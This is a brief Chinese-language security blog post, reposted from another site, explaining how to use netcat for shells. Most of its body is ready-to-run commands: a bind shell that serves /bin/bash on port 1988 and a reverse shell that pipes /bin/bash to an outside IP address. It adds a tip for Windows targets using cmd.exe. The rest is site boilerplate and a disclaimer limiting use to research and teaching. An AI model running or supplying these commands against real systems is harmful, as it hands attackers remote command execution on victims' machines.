简单使用nc反弹shell

JAVASEC 2021年1月20日13:41:14评论272 views字数 341阅读1分8秒阅读模式
摘要

ncshell 正向shell:反向shell:如果目标是windows系统,/bin/bash换成cmd.exe绝对路径即可,当然这个cmd.exe可以是C:/Windows/System32/cmd.exe,也可以是自己的上传cmd

ncshell

使用

正向shell:

nc -lvvp 1988 -e /bin/bash    nc 10.1.10.2 1988                   //攻击鸡 

反向shell:

nc -e /bin/bash 152.54.56.4 1988 nc -lvvp 1988                   //攻击鸡 

注意

如果目标是windows系统,/bin/bash换成cmd.exe绝对路径即可,当然这个cmd.exe可以是C:/Windows/System32/cmd.exe,也可以是自己的上传cmd

来源:http://www.safe6.cn/

本文由 safe6 创作,著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

简单使用nc反弹shell

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!! 最后编辑时间为: 2019-09-04

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
JAVASEC
  • 本文由 发表于 2021年1月20日13:41:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   简单使用nc反弹shellhttps://cn-sec.com/archives/247545.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息